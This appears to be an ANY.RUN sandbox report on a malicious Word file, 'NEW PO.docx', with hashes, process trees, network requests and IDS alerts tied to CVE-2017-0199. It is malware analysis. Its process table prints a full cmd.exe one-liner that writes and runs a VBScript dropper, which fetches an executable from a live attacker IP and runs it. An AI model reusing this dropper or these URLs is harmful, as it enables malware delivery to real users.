analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

NEW PO.docx

Full analysis: https://app.any.run/tasks/959850e5-5892-4937-a3ff-682194859568
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: November 15, 2018, 10:43:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
generated-doc
opendir
trojan
loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

93C3E76659E7893FCEF5F63EF1AFC403

SHA1:

BB162586C1A1FAF0D5544F8223748E5ECA6F623E

SHA256:

C37ED90B11B277ADA5CC16671052962A85E4B2CAD61079E45655A2A680C1C93E

SSDEEP:

384:TQeNh+wS115Wp39FG6F7//o5wMAqNciBph:OwAk9GAycGP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Downloads executable files from the Internet

      • WScript.exe (PID: 948)

    • Downloads executable files from IP

      • WScript.exe (PID: 948)

    • Application was dropped or rewritten from another process

      • VUHTXN.eXe (PID: 2388)
      • VUHTXN.eXe (PID: 1048)

  • SUSPICIOUS

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 668)

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 668)
      • mshta.exe (PID: 2544)
      • WScript.exe (PID: 948)

    • Executes scripts

      • cmd.exe (PID: 2080)

    • Reads the machine GUID from the registry

      • WScript.exe (PID: 948)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2544)

    • Executable content was dropped or overwritten

      • WScript.exe (PID: 948)

    • Application launched itself

      • VUHTXN.eXe (PID: 1048)

  • INFO

    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 668)

    • Reads internet explorer settings

      • mshta.exe (PID: 2544)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 668)

    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 668)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 668)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

XML

AppVersion: 14
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 70
LinksUpToDate: No
Company: -
TitlesOfParts: -
HeadingPairs:
  • Title
  • 1
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 61
Words: 10
Pages: 1
TotalEditTime: -
Template: Normal.dotm
ModifyDate: 2018:11:08 13:02:00Z
CreateDate: 2018:11:08 13:02:00Z
RevisionNumber: 2
LastModifiedBy: Olachi

XMP

Creator: Olachi

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1474
ZipCompressedSize: 398
ZipCRC: 0x344b4b79
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
6
Malicious processes
0
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start winword.exe mshta.exe no specs cmd.exe no specs wscript.exe vuhtxn.exe no specs vuhtxn.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
668"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\NEW PO.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.5123.5000
2544C:\Windows\System32\mshta.exe -EmbeddingC:\Windows\System32\mshta.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2080"C:\Windows\System32\cmd.exe" /c CD %temp% & @echo set S2zB4rN4jB5pO0tY9pG3qC3nP7xK1l = createobject("wscript.shell") >UKUOJZ.vBS & @echo Dim M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o >>UKUOJZ.vBS & @echo Dim U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q >>UKUOJZ.vBS & @echo Dim W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p >>UKUOJZ.vBS & @echo Dim G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t >>UKUOJZ.vBS & @echo M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o = "http://31.184.198.161/~winvps/1_com/putt/tny.exe" >>UKUOJZ.vBS & @echo U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q = "VUHTXN.eXe" >>UKUOJZ.vBS & @echo Set W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p = CreateObject("MSXML2.XMLHTTP") >>UKUOJZ.vBS & @echo W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.Open "GET", M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o, False >>UKUOJZ.vBS & @echo W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.send ("") >>UKUOJZ.vBS & @echo If W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.Status = 200 Then >>UKUOJZ.vBS & @echo Set G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t = CreateObject("ADODB.Stream") >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Open >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Type = 1 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Write W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.ResponseBody >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Position = 0 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.SaveToFile U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q, 2 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Close >>UKUOJZ.vBS & @echo Set nE= Nothing >>UKUOJZ.vBS & @echo End If >>UKUOJZ.vBS & @echo Set W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p = Nothing >>UKUOJZ.vBS & @echo WScript.Sleep(5000) >>UKUOJZ.VBs& @echo S2zB4rN4jB5pO0tY9pG3qC3nP7xK1l.run(U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q) >>UKUOJZ.vBS & sTaRt UKUOJZ.vbs C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
948"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\UKUOJZ.vBS" C:\Windows\System32\WScript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
1048"C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe" C:\Users\admin\AppData\Local\Temp\VUHTXN.eXeWScript.exe
User:
admin
Company:
tynepc
Integrity Level:
MEDIUM
Description:
quincubital
Exit code:
0
Version:
5.07
2388C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe" C:\Users\admin\AppData\Local\Temp\VUHTXN.eXeVUHTXN.eXe
User:
admin
Company:
tynepc
Integrity Level:
MEDIUM
Description:
quincubital
Version:
5.07
Total events
2 521
Read events
2 102
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
25
Text files
35
Unknown types
4

Dropped files

PID
Process
Filename
Type
668WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR61A6.tmp.cvr
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{D3890850-C0D3-46E8-AEF4-580DA91BDD8F}
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{9F57A54E-C5C6-4EA9-B636-133A6245DD16}
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\792D9837.doc
MD5:
SHA256:
668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:204B65807CDA7C92A1368CAFD6D9D925
SHA256:1521D2DE971C5C1BAB4DD06E0A1C42B0F9598A10068F9D01FF92A92AA1873936
668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:B7CABB3BB1AB1E12CCBA5F9929AF7128
SHA256:4F20709C2224C2CEA468FC457ECED8416FF2ADE6B7E42C63B8D1F2FDACE13801
668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B391981.doctext
MD5:2B9FE3A1E0EB8DFCB12F3C8E2806CCF3
SHA256:E84D431570A6395BE242E3434A5C6AAFB9039357A3B2A1A4E5B13AD0CC1547C5
668WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\ZSM7OJX4.txttext
MD5:2D5C45D87F48B6EED783FD9D9F1FD5AB
SHA256:904DB401B53862C3C0FF0490EA43C7FC33572FDEB8A13979A3A0C25E93001768
668WINWORD.EXEC:\Users\admin\Desktop\~$NEW PO.docxpgc
MD5:7A51AA69021A5BAC43479C30D0BE582F
SHA256:CCD4790BFF935C89A07DAC5745701412C4828E02C8A0F9A5E4C013616EDE6634
668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2161AA80-9B5D-45BF-B736-8637BDE1583D}.FSDbinary
MD5:67E0B24050CBF6173DDF8D82177C0FC2
SHA256:38EE0F205A50BFFFAF4BAACE88B8D53AAF405555E19E84A458E84156658B84B1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
5
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
668
WINWORD.EXE
GET
304
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
668
WINWORD.EXE
GET
304
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
668
WINWORD.EXE
HEAD
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
668
WINWORD.EXE
GET
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
668
WINWORD.EXE
HEAD
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
668
WINWORD.EXE
HEAD
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.doc
RU
text
10.3 Kb
suspicious
948
WScript.exe
GET
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.exe
RU
executable
558 Kb
suspicious
668
WINWORD.EXE
GET
200
31.184.198.161:80
http://31.184.198.161/~winvps/1_com/putt/tny.hta
RU
html
2.29 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
948
WScript.exe
31.184.198.161:80
Petersburg Internet Network ltd.
RU
suspicious
856
svchost.exe
104.28.15.54:443
urlz.fr
Cloudflare Inc
US
shared
668
WINWORD.EXE
104.28.15.54:443
urlz.fr
Cloudflare Inc
US
shared
668
WINWORD.EXE
31.184.198.161:80
Petersburg Internet Network ltd.
RU
suspicious

DNS requests

Domain
IP
Reputation
urlz.fr
  • 104.28.15.54
  • 104.28.14.54
shared

Threats

PID
Process
Class
Message
668
WINWORD.EXE
A Network Trojan was detected
ET CURRENT_EVENTS CVE-2017-0199 Common Obfus Stage 2 DL
668
WINWORD.EXE
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTA application download
668
WINWORD.EXE
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
668
WINWORD.EXE
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
948
WScript.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
948
WScript.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
948
WScript.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
948
WScript.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
668
WINWORD.EXE
Attempted User Privilege Gain
ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
NEW PO.docx